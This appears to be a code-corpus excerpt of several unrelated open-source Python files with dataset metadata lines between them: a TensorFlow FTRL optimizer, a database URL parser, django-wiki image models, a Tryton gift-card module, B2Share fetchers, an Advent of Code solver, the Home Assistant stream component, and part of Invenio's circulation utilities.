'l2_regularization_strength %f needs to be positive or zero' %
l2_regularization_strength)
if l2_shrinkage_regularization_strength < 0.0:
raise ValueError(
'l2_shrinkage_regularization_strength %f needs to be positive'
' or zero' % l2_shrinkage_regularization_strength)
self._set_hyper('learning_rate', learning_rate)
self._set_hyper('decay', self._initial_decay)
self._set_hyper('learning_rate_power', learning_rate_power)
self._set_hyper('l1_regularization_strength', l1_regularization_strength)
self._set_hyper('l2_regularization_strength', l2_regularization_strength)
self._initial_accumulator_value = initial_accumulator_value
self._l2_shrinkage_regularization_strength = (
l2_shrinkage_regularization_strength)
def _create_slots(self, var_list):
# Create the "accum" and "linear" slots.
for var in var_list:
dtype = var.dtype.base_dtype
init = init_ops.constant_initializer(
self._initial_accumulator_value, dtype=dtype)
self.add_slot(var, 'accumulator', init)
self.add_slot(var, 'linear')
def _resource_apply_dense(self, grad, var):
var_dtype = var.dtype.base_dtype
lr_t = self._decayed_lr(var_dtype)
learning_rate_power = self._get_hyper('learning_rate_power', var_dtype)
l1_regularization_strength = self._get_hyper('l1_regularization_strength',
var_dtype)
l2_regularization_strength = self._get_hyper('l2_regularization_strength',
var_dtype)
accum = self.get_slot(var, 'accumulator')
linear = self.get_slot(var, 'linear')
if self._l2_shrinkage_regularization_strength <= 0.0:
return training_ops.resource_apply_ftrl(
var.handle,
accum.handle,
linear.handle,
grad,
lr_t,
l1_regularization_strength,
l2_regularization_strength,
learning_rate_power,
use_locking=self._use_locking)
else:
return training_ops.resource_apply_ftrl_v2(
var.handle,
accum.handle,
linear.handle,
grad,
lr_t,
l1_regularization_strength,
l2_regularization_strength,
math_ops.cast(self._l2_shrinkage_regularization_strength, var_dtype),
learning_rate_power,
use_locking=self._use_locking)
def _resource_apply_sparse(self, grad, var, indices):
var_dtype = var.dtype.base_dtype
lr_t = self._decayed_lr(var_dtype)
learning_rate_power = self._get_hyper('learning_rate_power', var_dtype)
l1_regularization_strength = self._get_hyper('l1_regularization_strength',
var_dtype)
l2_regularization_strength = self._get_hyper('l2_regularization_strength',
var_dtype)
accum = self.get_slot(var, 'accumulator')
linear = self.get_slot(var, 'linear')
if self._l2_shrinkage_regularization_strength <= 0.0:
return training_ops.resource_sparse_apply_ftrl(
var.handle,
accum.handle,
linear.handle,
grad,
indices,
lr_t,
l1_regularization_strength,
l2_regularization_strength,
learning_rate_power,
use_locking=self._use_locking)
else:
return training_ops.resource_sparse_apply_ftrl_v2(
var.handle,
accum.handle,
linear.handle,
grad,
indices,
lr_t,
l1_regularization_strength,
l2_regularization_strength,
math_ops.cast(self._l2_shrinkage_regularization_strength, var_dtype),
learning_rate_power,
use_locking=self._use_locking)
def get_config(self):
config = super(Ftrl, self).get_config()
config.update({
'learning_rate':
self._serialize_hyperparameter('learning_rate'),
'decay':
self._serialize_hyperparameter('decay'),
'initial_accumulator_value':
self._initial_accumulator_value,
'learning_rate_power':
self._serialize_hyperparameter('learning_rate_power'),
'l1_regularization_strength':
            self._serialize_hyperparameter('l1_regularization_strength'),
'l2_regularization_strength':
            self._serialize_hyperparameter('l2_regularization_strength'),
'l2_shrinkage_regularization_strength':
self._l2_shrinkage_regularization_strength,
})
return config
| apache-2.0 | -5,455,901,851,465,060,000 | 41.106838 | 80 | 0.628134 | false |
faeli/joke | joke/fair/db_url.py | 1 | 2442 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from urlparse import urlparse, parse_qsl
except ImportError as e:
from urllib.parse import urlparse, parse_qsl
from .database import SQLiteDatabase
schemes = {
'sqlite': SQLiteDatabase
}
def parseresult_to_dict(parsed):
# urlparse in python 2.6 is broken so query will be empty and instead
# appended to path complete with '?'
path_parts = parsed.path[1:].split('?')
try:
query = path_parts[1]
except IndexError:
query = parsed.query
connect_kwargs = {'database': path_parts[0]}
if parsed.username:
connect_kwargs['user'] = parsed.username
if parsed.password:
connect_kwargs['password'] = parsed.password
if parsed.hostname:
connect_kwargs['host'] = parsed.hostname
if parsed.port:
connect_kwargs['port'] = parsed.port
# Adjust parameters for MySQL.
if parsed.scheme == 'mysql' and 'password' in connect_kwargs:
connect_kwargs['passwd'] = connect_kwargs.pop('password')
elif 'sqlite' in parsed.scheme and not connect_kwargs['database']:
connect_kwargs['database'] = ':memory:'
# Get additional connection args from the query string
qs_args = parse_qsl(query, keep_blank_values=True)
for key, value in qs_args:
if value.lower() == 'false':
value = False
elif value.lower() == 'true':
value = True
elif value.isdigit():
value = int(value)
elif '.' in value and all(p.isdigit() for p in value.split('.', 1)):
try:
value = float(value)
except ValueError:
pass
elif value.lower() in ('null', 'none'):
value = None
connect_kwargs[key] = value
return connect_kwargs
def connect(db_url, **connect_params):
parsed = urlparse(db_url)
connect_kwargs = parseresult_to_dict(parsed)
connect_kwargs.update(connect_params)
database_class = schemes.get(parsed.scheme)
if database_class is None:
if database_class in schemes:
raise RuntimeError('Attempted to use "%s" but a required library '
'could not be imported.' % parsed.scheme)
else:
raise RuntimeError('Unrecognized or unsupported scheme: "%s".'%
parsed.scheme)
return database_class(**connect_kwargs)
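# Illustrative usage (the file name and the extra query key are made up):
#   db = connect('sqlite:///app.db?flag=true')
# Query-string pairs are coerced (true/false, ints, floats, null/none) and are
# passed to the database class as extra keyword arguments.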
# | mit | -5,027,614,411,988,602,000 | 29.5375 | 78 | 0.604013 | false |
a-nai/django-wiki | wiki/plugins/images/models.py | 1 | 5261 | from __future__ import unicode_literals
from __future__ import absolute_import
import os.path
from django.conf import settings as django_settings
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils.translation import ugettext_lazy as _
from . import settings
from wiki.models.pluginbase import RevisionPlugin, RevisionPluginRevision
from django.db.models import signals
from six.moves import range
if "sorl.thumbnail" not in django_settings.INSTALLED_APPS:
raise ImproperlyConfigured(
'wiki.plugins.images: needs sorl.thumbnail in INSTALLED_APPS')
def upload_path(instance, filename):
# Has to match original extension filename
upload_path = settings.IMAGE_PATH
upload_path = upload_path.replace(
'%aid', str(instance.plugin.image.article.id))
if settings.IMAGE_PATH_OBSCURIFY:
import uuid
upload_path = os.path.join(upload_path, uuid.uuid4().hex)
return os.path.join(upload_path, filename)
@python_2_unicode_compatible
class Image(RevisionPlugin):
# The plugin system is so awesome that the inheritor doesn't need to do
# anything! :D
def can_write(self, user):
if not settings.ANONYMOUS and (not user or user.is_anonymous()):
return False
return RevisionPlugin.can_write(self, user)
def can_delete(self, user):
return self.can_write(user)
class Meta:
verbose_name = _('image')
verbose_name_plural = _('images')
db_table = 'wiki_images_image' # Matches label of upcoming 0.1 release
if settings.APP_LABEL:
app_label = settings.APP_LABEL
def __str__(self):
title = (_('Image: %s') % self.current_revision.imagerevision.get_filename(
)) if self.current_revision else _('Current revision not set!!')
return str(title)
@python_2_unicode_compatible
class ImageRevision(RevisionPluginRevision):
image = models.ImageField(upload_to=upload_path,
max_length=2000, height_field='height',
width_field='width', blank=True, null=True,
storage=settings.STORAGE_BACKEND)
width = models.SmallIntegerField(blank=True, null=True)
height = models.SmallIntegerField(blank=True, null=True)
def get_filename(self):
if self.image:
try:
return self.image.name.split('/')[-1]
except OSError:
pass
return None
def path(self):
if self.image:
try:
#path1=self.image.path.split("/")[:-1]
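                # Slicing off the first 29 characters of the absolute path strips
                # a fixed-length, site-specific prefix (assumed to be the media
                # root); the remainder is returned as a relative path.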
path1=self.image.path[29:]
return path1
except OSError:
pass
return None
def dimensions(self):
return "{}x{}".format(self.width, self.height)
def get_size(self):
"""Used to retrieve the file size and not cause exceptions."""
try:
return self.image.size
except ValueError:
return None
except OSError:
return None
def inherit_predecessor(self, image, skip_image_file=False):
"""
Inherit certain properties from predecessor because it's very
convenient. Remember to always call this method before
setting properties :)"""
predecessor = image.current_revision.imagerevision
self.plugin = predecessor.plugin
self.deleted = predecessor.deleted
self.locked = predecessor.locked
if not skip_image_file:
try:
self.image = predecessor.image
self.width = predecessor.width
self.height = predecessor.height
except IOError:
self.image = None
class Meta:
verbose_name = _('image revision')
verbose_name_plural = _('image revisions')
# Matches label of upcoming 0.1 release
db_table = 'wiki_images_imagerevision'
if settings.APP_LABEL:
app_label = settings.APP_LABEL
ordering = ('-created',)
def __str__(self):
title = _('Image Revision: %d') % self.revision_number
return str(title)
def on_image_revision_delete(instance, *args, **kwargs):
if not instance.image:
return
# Remove image file
path = instance.image.path.split("/")[:-1]
instance.image.delete(save=False)
# Clean up empty directories
# Check for empty folders in the path. Delete the first two.
if len(path[-1]) == 32:
# Path was (most likely) obscurified so we should look 2 levels down
max_depth = 2
else:
max_depth = 1
for depth in range(0, max_depth):
delete_path = "/".join(path[:-depth] if depth > 0 else path)
try:
dir_list = os.listdir(
os.path.join(django_settings.MEDIA_ROOT, delete_path))
except OSError:
# Path does not exist, so let's not try to remove it...
dir_list = None
if not (dir_list is None) and len(dir_list) == 0:
os.rmdir(delete_path)
signals.pre_delete.connect(on_image_revision_delete, ImageRevision)
| gpl-3.0 | -3,529,403,965,202,404,400 | 32.08805 | 83 | 0.617943 | false |
fulfilio/trytond-gift-card | product.py | 1 | 3978 | # -*- coding: utf-8 -*-
from trytond.model import fields, ModelSQL, ModelView
from trytond.pool import PoolMeta
from trytond.pyson import Eval, Bool
__all__ = ['Product', 'GiftCardPrice']
__metaclass__ = PoolMeta
class Product:
"Product"
__name__ = 'product.product'
is_gift_card = fields.Boolean("Is Gift Card ?")
gift_card_delivery_mode = fields.Selection([
('virtual', 'Virtual'),
('physical', 'Physical'),
('combined', 'Combined'),
], 'Gift Card Delivery Mode')
allow_open_amount = fields.Boolean("Allow Open Amount ?")
gc_min = fields.Numeric("Gift Card Minimum Amount")
gc_max = fields.Numeric("Gift Card Maximum Amount")
gift_card_prices = fields.One2Many(
'product.product.gift_card.price', 'product', 'Gift Card Prices',
)
@classmethod
def view_attributes(cls):
return super(Product, cls).view_attributes() + [
('//group[@id="gift_card_info"]', 'states', {
'invisible': ~Bool(Eval('is_gift_card'))
})]
@staticmethod
def default_gift_card_delivery_mode():
return 'physical'
@staticmethod
def default_is_gift_card():
return False
@staticmethod
def default_allow_open_amount():
return False
@classmethod
def __setup__(cls):
super(Product, cls).__setup__()
cls._error_messages.update({
'inappropriate_product':
'Product %s is not appropriate under %s delivery mode',
'invalid_amount':
'Gift Card minimum amount must be smaller than gift card '
'maximum amount',
'negative_amount_not_allowed':
'Gift card amounts can not be negative'
})
@classmethod
def validate(cls, templates):
"""
Validates each product template
"""
super(Product, cls).validate(templates)
for template in templates:
template.check_type_and_mode()
template.check_gc_min_max()
def check_gc_min_max(self):
"""
Check minimum amount to be smaller than maximum amount
"""
if not self.allow_open_amount:
return
if self.gc_min < 0 or self.gc_max < 0:
self.raise_user_error("negative_amount_not_allowed")
if self.gc_min > self.gc_max:
self.raise_user_error("invalid_amount")
def check_type_and_mode(self):
"""
Type must be service only if delivery mode is virtual
Type must be goods only if delivery mode is combined or physical
"""
if not self.is_gift_card:
return
if (
self.gift_card_delivery_mode == 'virtual' and
self.type != 'service'
) or (
self.gift_card_delivery_mode in ['physical', 'combined'] and
self.type != 'goods'
):
self.raise_user_error(
"inappropriate_product", (
self.rec_name, self.gift_card_delivery_mode
)
)
class GiftCardPrice(ModelSQL, ModelView):
"Gift Card Price"
__name__ = 'product.product.gift_card.price'
_rec_name = 'price'
product = fields.Many2One(
"product.product", "Product", required=True, select=True
)
price = fields.Numeric("Price", required=True)
@classmethod
def __setup__(cls):
super(GiftCardPrice, cls).__setup__()
cls._error_messages.update({
'negative_amount': 'Price can not be negative'
})
@classmethod
def validate(cls, prices):
"""
Validate product price for gift card
"""
super(GiftCardPrice, cls).validate(prices)
for price in prices:
price.check_price()
def check_price(self):
"""
Price can not be negative
"""
if self.price < 0:
self.raise_user_error("negative_amount")
| bsd-3-clause | -2,309,821,036,936,442,000 | 26.246575 | 74 | 0.565108 | false |
DavidCain/WinterSchool | ws/utils/ratings.py | 1 | 7905 | from datetime import timedelta
from django.db.models import Case, F, IntegerField, Q, Sum, When
import ws.utils.perms as perm_utils
from ws import models
from ws.utils.dates import local_date, local_now, ws_year
def deactivate_ratings(participant, activity):
""" Mark any existing ratings for the activity as inactive. """
find_ratings = {
'participant__pk': participant.pk,
'activity': activity,
'active': True,
}
for existing in models.LeaderRating.objects.filter(Q(**find_ratings)):
existing.active = False
existing.save()
class LeaderApplicationMixin:
""" Some common tools for interacting with LeaderApplication objects.
Requires self.activity
"""
def can_reapply(self, latest_application):
""" Winter School allows one application per year.
Other activities just impose a reasonable waiting time.
"""
if not latest_application:
return True # Not "re-applying," just applying for first time
if latest_application.activity == models.LeaderRating.WINTER_SCHOOL:
return latest_application.year < self.application_year
# Allow upgrades after 2 weeks, repeat applications after ~6 months
waiting_period_days = 14 if latest_application.rating_given else 180
time_passed = local_now() - latest_application.time_created
return time_passed > timedelta(days=waiting_period_days)
@property
def application_year(self):
if self.activity == 'winter_school':
return ws_year()
return local_date().year
@property
def num_chairs(self):
""" Return the number of chairs for this activity. """
# It's important that this remain a property (dynamically requested, not stored at init)
# This way, views that want to get activity from self.kwargs can inherit from the mixin
if not hasattr(self, '_num_chairs'):
self._num_chairs = perm_utils.num_chairs(self.activity)
return self._num_chairs
@property
def model(self):
""" Return the application model for this activity type.
The model will be None if no application exists for the activity.
"""
if not hasattr(self, '_model'):
self._model = models.LeaderApplication.model_from_activity(self.activity)
return self._model
def joined_queryset(self):
""" Return applications, joined with commonly used attributes.
Warning: Will raise an AttributeError if self.model failed to find
an application type.
"""
applications = self.model.objects.select_related('participant')
return applications.prefetch_related(
'participant__leaderrecommendation_set', 'participant__leaderrating_set'
)
class RatingsRecommendationsMixin:
""" Query tools for counting ratings & recs for LeaderApplications.
Requires self.chair to to be a Participant object (that chairs the activity).
"""
@property
def gave_rec(self):
""" Select applications where the chair gave a recommendation. """
return Q(
participant__leaderrecommendation__time_created__gte=F('time_created'),
participant__leaderrecommendation__activity=self.activity,
participant__leaderrecommendation__creator=self.chair,
)
@property
def gave_rating(self):
""" Select applications where a rating was created after app creation. """
return Q(
# NOTE: Rating doesn't need to be active (if the leader was
# deactivated, we don't want their application to re-appear)
participant__leaderrating__time_created__gte=F('time_created'),
participant__leaderrating__activity=self.activity,
)
@staticmethod
def sum_annotation(selector):
# Django 2.0: Use conditional aggregation instead
return Sum(Case(When(selector, then=1), default=0, output_field=IntegerField()))
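# Sketch only, not part of the original module: the "Django 2.0" note above
# refers to conditional aggregation, which would look roughly like the
# hypothetical variant below. Treat it as a hint rather than a verified
# drop-in replacement, since the exact equivalence depends on the join being
# annotated.
#
#   from django.db.models import Count
#
#   def sum_annotation_with_filter(selector):
#       return Count('pk', filter=selector)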
class ApplicationManager(LeaderApplicationMixin, RatingsRecommendationsMixin):
""" Leader applications for an activity, to be displayed to the chair. """
def __init__(self, *args, **kwargs):
# Set only if defined (so subclasses can instead define with @property)
# Also, pop from kwargs so object.__init__ doesn't error out
if 'chair' in kwargs:
self.chair = kwargs.pop('chair') # <Participant>
if 'activity' in kwargs:
self.activity = kwargs.pop('activity')
super().__init__(*args, **kwargs)
def sorted_annotated_applications(self):
""" Sort all applications by order of attention they need. """
applications = self.joined_queryset()
# Identify which have ratings and/or the leader's recommendation
applications = applications.annotate(
num_ratings=self.sum_annotation(self.gave_rating),
num_recs=self.sum_annotation(self.gave_rec),
)
return applications.distinct().order_by(
'-archived', 'num_ratings', 'num_recs', 'time_created'
)
def pending_applications(self):
""" All applications which do not yet have a rating.
NOTE: This immediately queries the database. If you need to deal with
past applications in addition to pending ones, it's recommended to call
sorted_annotated_applications() and then do Python-based filtering from
there.
Includes applications which should be given a recommendation first as
well as applications that are merely awaiting a chair rating.
"""
# Some activities don't actually have an application type defined! (e.g. 'cabin')
# Exit early so we don't fail trying to build a database query
if self.model is None:
return []
return list(
self.sorted_annotated_applications()
.filter(num_ratings=0)
.exclude(archived=True)
)
@staticmethod
def _chair_should_recommend(app):
""" Return if the chair should be expected to recommend this application.
This determines where the application appears in the queue of pending
applications (assuming it's a pending application in the first place!).
"""
if app.archived: # The application is no longer pending
return False
if app.num_recs: # The chair has already made a recommendation
return False
if app.num_ratings: # The application received a rating
return False
return True
def needs_rec(self, applications):
""" Applications which need to be given a rating by the viewing chair.
If there's only one chair, then this will be a blank list (it makes no sense
for a chair to make recommendations when there are no co-chairs to heed
those recommendations).
"""
if self.model is None or self.num_chairs < 2:
return []
return [app for app in applications if self._chair_should_recommend(app)]
def _should_rate(self, app):
if app.archived: # The application is no longer pending
return False
if app.num_ratings: # The application received a rating
return False
# If there are multiple chairs, we request recommendations first
if self.num_chairs > 1:
return bool(app.num_recs)
return True
def needs_rating(self, applications):
""" Return applications which need a rating, but not a recommendation.
When there are multiple chairs, we count certain applications as
needing a recommendation first. It's true that these applications need
a rating as well, but we don't want to double count.
"""
return [app for app in applications if self._should_rate(app)]
| gpl-3.0 | -4,544,151,928,431,443,500 | 37.560976 | 96 | 0.651739 | false |
emanueldima/b2share | b2share/modules/deposit/fetchers.py | 1 | 1411 | # -*- coding: utf-8 -*-
#
# This file is part of EUDAT B2Share.
# Copyright (C) 2016 CERN.
#
# B2Share is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# B2Share is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with B2Share; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""PID Fetchers."""
from collections import namedtuple
from .providers import DepositUUIDProvider
FetchedPID = namedtuple('FetchedPID', ['provider', 'pid_type', 'pid_value'])
def b2share_deposit_uuid_fetcher(record_uuid, data):
"""Fetch a deposit's identifiers."""
return FetchedPID(
provider=DepositUUIDProvider,
pid_type=DepositUUIDProvider.pid_type,
pid_value=str(data['_deposit']['id']),
)
| gpl-2.0 | -4,996,539,150,165,683,000 | 35.179487 | 76 | 0.736357 | false |
suprzer0/aoc2016 | day4/solve.py | 1 | 1719 | from collections import namedtuple, Counter
from itertools import groupby
import re
from string import ascii_lowercase
Room = namedtuple('Room', ['name', 'id', 'chksum'])
def common_chars(text):
chars = ''
cnt = Counter(text)
del cnt['-']
for group in groupby(cnt.most_common(), key=lambda c: c[1]):
chars += ''.join(sorted(g[0] for g in group[1]))
return chars
def decrypt(s, offset):
offset %= len(ascii_lowercase)
rotated = ascii_lowercase[offset:]+ascii_lowercase[:offset]
newmap = str.maketrans(ascii_lowercase+'-', rotated+' ')
return str.translate(s, newmap)
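# Worked examples (illustrative; made-up strings rather than puzzle input):
#
#   common_chars('aaaaa-bbb-z-y-x')  # -> 'abxyz' (counts 5,3,1,1,1; ties alphabetical)
#   decrypt('uryyb-jbeyq', 13)       # -> 'hello world' ('-' is mapped to ' ')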
def solve_p1(data):
"""
"""
valid_roomid_sum = 0
for room in data:
if common_chars(room.name).startswith(room.chksum):
valid_roomid_sum += room.id
return valid_roomid_sum
def solve_p2(data):
"""
"""
for room in data:
if common_chars(room.name).startswith(room.chksum):
d = decrypt(room.name, room.id)
if d.replace(' ', '').startswith('northpoleobjects'):
return room.id
return None
room_re = re.compile(r'^(\w+(?:-\w+)*)-(\d+)\[(\w+)\]$')
def load_data(inputfile):
"""
Converts the data from the input file into something usable
by the solve functions.
"""
rooms = []
for line in inputfile:
matches = room_re.match(line)
name, roomid, chksum = matches.groups()
rooms.append(Room(name, int(roomid), chksum))
return rooms
if __name__ == '__main__':
with open('input.txt', 'r') as inputfile:
data = load_data(inputfile)
print("Part 1 Solution")
print(solve_p1(data))
print("Part 2 Solution")
print(solve_p2(data))
| mit | 5,726,174,863,873,327,000 | 25.045455 | 65 | 0.601513 | false |
pschmitt/home-assistant | homeassistant/components/stream/__init__.py | 2 | 7096 | """Provide functionality to stream video source."""
import logging
import secrets
import threading
import voluptuous as vol
from homeassistant.const import CONF_FILENAME, EVENT_HOMEASSISTANT_STOP
from homeassistant.core import callback
from homeassistant.exceptions import HomeAssistantError
import homeassistant.helpers.config_validation as cv
from homeassistant.loader import bind_hass
from .const import (
ATTR_ENDPOINTS,
ATTR_STREAMS,
CONF_DURATION,
CONF_LOOKBACK,
CONF_STREAM_SOURCE,
DOMAIN,
SERVICE_RECORD,
)
from .core import PROVIDERS
from .hls import async_setup_hls
_LOGGER = logging.getLogger(__name__)
CONFIG_SCHEMA = vol.Schema({DOMAIN: vol.Schema({})}, extra=vol.ALLOW_EXTRA)
STREAM_SERVICE_SCHEMA = vol.Schema({vol.Required(CONF_STREAM_SOURCE): cv.string})
SERVICE_RECORD_SCHEMA = STREAM_SERVICE_SCHEMA.extend(
{
vol.Required(CONF_FILENAME): cv.string,
vol.Optional(CONF_DURATION, default=30): int,
vol.Optional(CONF_LOOKBACK, default=0): int,
}
)
@bind_hass
def request_stream(hass, stream_source, *, fmt="hls", keepalive=False, options=None):
"""Set up stream with token."""
if DOMAIN not in hass.config.components:
raise HomeAssistantError("Stream integration is not set up.")
if options is None:
options = {}
# For RTSP streams, prefer TCP
if isinstance(stream_source, str) and stream_source[:7] == "rtsp://":
options = {
"rtsp_flags": "prefer_tcp",
"stimeout": "5000000",
**options,
}
try:
streams = hass.data[DOMAIN][ATTR_STREAMS]
stream = streams.get(stream_source)
if not stream:
stream = Stream(hass, stream_source, options=options, keepalive=keepalive)
streams[stream_source] = stream
else:
# Update keepalive option on existing stream
stream.keepalive = keepalive
# Add provider
stream.add_provider(fmt)
if not stream.access_token:
stream.access_token = secrets.token_hex()
stream.start()
return hass.data[DOMAIN][ATTR_ENDPOINTS][fmt].format(stream.access_token)
except Exception:
raise HomeAssistantError("Unable to get stream")
async def async_setup(hass, config):
"""Set up stream."""
# Set log level to error for libav
logging.getLogger("libav").setLevel(logging.ERROR)
# Keep import here so that we can import stream integration without installing reqs
# pylint: disable=import-outside-toplevel
from .recorder import async_setup_recorder
hass.data[DOMAIN] = {}
hass.data[DOMAIN][ATTR_ENDPOINTS] = {}
hass.data[DOMAIN][ATTR_STREAMS] = {}
# Setup HLS
hls_endpoint = async_setup_hls(hass)
hass.data[DOMAIN][ATTR_ENDPOINTS]["hls"] = hls_endpoint
# Setup Recorder
async_setup_recorder(hass)
@callback
def shutdown(event):
"""Stop all stream workers."""
for stream in hass.data[DOMAIN][ATTR_STREAMS].values():
stream.keepalive = False
stream.stop()
_LOGGER.info("Stopped stream workers")
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, shutdown)
async def async_record(call):
"""Call record stream service handler."""
await async_handle_record_service(hass, call)
hass.services.async_register(
DOMAIN, SERVICE_RECORD, async_record, schema=SERVICE_RECORD_SCHEMA
)
return True
class Stream:
"""Represents a single stream."""
def __init__(self, hass, source, options=None, keepalive=False):
"""Initialize a stream."""
self.hass = hass
self.source = source
self.options = options
self.keepalive = keepalive
self.access_token = None
self._thread = None
self._thread_quit = None
self._outputs = {}
if self.options is None:
self.options = {}
@property
def outputs(self):
"""Return stream outputs."""
return self._outputs
def add_provider(self, fmt):
"""Add provider output stream."""
if not self._outputs.get(fmt):
provider = PROVIDERS[fmt](self)
self._outputs[fmt] = provider
return self._outputs[fmt]
def remove_provider(self, provider):
"""Remove provider output stream."""
if provider.name in self._outputs:
del self._outputs[provider.name]
self.check_idle()
if not self._outputs:
self.stop()
def check_idle(self):
"""Reset access token if all providers are idle."""
if all([p.idle for p in self._outputs.values()]):
self.access_token = None
def start(self):
"""Start a stream."""
# Keep import here so that we can import stream integration without installing reqs
# pylint: disable=import-outside-toplevel
from .worker import stream_worker
if self._thread is None or not self._thread.isAlive():
self._thread_quit = threading.Event()
self._thread = threading.Thread(
name="stream_worker",
target=stream_worker,
args=(self.hass, self, self._thread_quit),
)
self._thread.start()
_LOGGER.info("Started stream: %s", self.source)
def stop(self):
"""Remove outputs and access token."""
self._outputs = {}
self.access_token = None
if not self.keepalive:
self._stop()
def _stop(self):
"""Stop worker thread."""
if self._thread is not None:
self._thread_quit.set()
self._thread.join()
self._thread = None
_LOGGER.info("Stopped stream: %s", self.source)
async def async_handle_record_service(hass, call):
"""Handle save video service calls."""
stream_source = call.data[CONF_STREAM_SOURCE]
video_path = call.data[CONF_FILENAME]
duration = call.data[CONF_DURATION]
lookback = call.data[CONF_LOOKBACK]
# Check for file access
if not hass.config.is_allowed_path(video_path):
raise HomeAssistantError(f"Can't write {video_path}, no access to path!")
# Check for active stream
streams = hass.data[DOMAIN][ATTR_STREAMS]
stream = streams.get(stream_source)
if not stream:
stream = Stream(hass, stream_source)
streams[stream_source] = stream
# Add recorder
recorder = stream.outputs.get("recorder")
if recorder:
raise HomeAssistantError(f"Stream already recording to {recorder.video_path}!")
recorder = stream.add_provider("recorder")
recorder.video_path = video_path
recorder.timeout = duration
stream.start()
# Take advantage of lookback
hls = stream.outputs.get("hls")
if lookback > 0 and hls:
num_segments = min(int(lookback // hls.target_duration), hls.num_segments)
# Wait for latest segment, then add the lookback
await hls.recv()
recorder.prepend(list(hls.get_segment())[-num_segments:])
| apache-2.0 | -3,241,758,894,251,153,000 | 29.718615 | 91 | 0.628241 | false |
robk5uj/invenio | modules/bibcirculation/lib/bibcirculation_utils.py | 1 | 21415 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2008, 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""BibCirculation Utils: Auxiliary methods of BibCirculation """
__revision__ = "$Id$"
from invenio.search_engine_utils import get_fieldvalues
from invenio.bibtask import task_low_level_submission
import invenio.bibcirculation_dblayer as db
from invenio.urlutils import create_html_link
from invenio.config import CFG_SITE_URL, CFG_TMPDIR
from invenio.bibcirculation_config import CFG_BIBCIRCULATION_AMAZON_ACCESS_KEY, \
CFG_BIBCIRCULATION_WORKING_DAYS, \
CFG_BIBCIRCULATION_HOLIDAYS
from invenio.messages import gettext_set_language
import datetime, time, re
DICC_REGEXP = re.compile("^\{('[^']*': ?('[^']*'|[0-9]*|None)(, ?'[^']*': ?('[^']*'|[0-9]*|None))*)?\}$")
def hold_request_mail(recid, borrower_id):
"""
Create the email that will be sent for each hold request.
@param recid: identify the record. Primary key of bibrec.
@type recid: int
@param borrower_id: identify the borrower. Primary key of crcBORROWER.
@type borrower_id: int
@return email(body)
"""
(book_title, book_year, book_author,
book_isbn, book_editor) = book_information_from_MARC(recid)
############## need some code refactoring ###############
more_holdings_infos = db.get_holdings_details(recid)
borrower_infos = db.get_borrower_details(borrower_id)
#########################################################
title_link = create_html_link(CFG_SITE_URL +
'/admin/bibcirculation/bibcirculationadmin.py/get_item_details',
{'recid': recid},
(book_title))
out = """
This is an automatic email for confirming the hold request for a
book on behalf of:
%s (email: %s)
title: %s
author: %s
location: %s
library: %s
publisher: %s
year: %s
isbn: %s
""" % (borrower_infos[1], borrower_infos[2],
title_link, book_author, more_holdings_infos[0][1],
more_holdings_infos[0][2],
book_editor, book_year, book_isbn)
return out
def get_book_cover(isbn):
"""
Retrieve book cover using Amazon web services.
@param isbn: book's isbn
@type isbn: string
@return book cover
"""
from xml.dom import minidom
import urllib
# connect to AWS
cover_xml = urllib.urlopen('http://ecs.amazonaws.com/onca/xml' \
'?Service=AWSECommerceService&AWSAccessKeyId=' \
+ CFG_BIBCIRCULATION_AMAZON_ACCESS_KEY + \
'&Operation=ItemSearch&Condition=All&' \
'ResponseGroup=Images&SearchIndex=Books&' \
'Keywords=' + isbn)
# parse XML
try:
xml_img = minidom.parse(cover_xml)
retrieve_book_cover = xml_img.getElementsByTagName('MediumImage')
book_cover = retrieve_book_cover.item(0).firstChild.firstChild.data
except AttributeError:
book_cover = "%s/img/book_cover_placeholder.gif" % (CFG_SITE_URL)
return book_cover
def book_information_from_MARC(recid):
"""
Retrieve book's information from MARC
@param recid: identify the record. Primary key of bibrec.
@type recid: int
@return tuple with title, year, author, isbn and editor.
"""
book_title = ' '.join(get_fieldvalues(recid, "245__a") + \
get_fieldvalues(recid, "245__b") + \
get_fieldvalues(recid, "245__n") + \
get_fieldvalues(recid, "245__p"))
book_year = ' '.join(get_fieldvalues(recid, "260__c"))
book_author = ' '.join(get_fieldvalues(recid, "100__a") + \
get_fieldvalues(recid, "100__u"))
book_isbn = ' '.join(get_fieldvalues(recid, "020__a"))
book_editor = ' , '.join(get_fieldvalues(recid, "260__a") + \
get_fieldvalues(recid, "260__b"))
return (book_title, book_year, book_author, book_isbn, book_editor)
def book_title_from_MARC(recid):
"""
Retrieve book's title from MARC
@param recid: identify the record. Primary key of bibrec.
@type recid: int
@return book's title
"""
book_title = ' '.join(get_fieldvalues(recid, "245__a") + \
get_fieldvalues(recid, "245__b") + \
get_fieldvalues(recid, "245__n") + \
get_fieldvalues(recid, "245__p"))
return book_title
def update_status_if_expired(loan_id):
"""
Update the loan's status if status is 'expired'.
@param loan_id: identify the loan. Primary key of crcLOAN.
@type loan_id: int
"""
loan_status = db.get_loan_status(loan_id)
if loan_status == 'expired':
db.update_loan_status('on loan', loan_id)
return
def get_next_day(date_string):
"""
Get the next day
@param date_string: date
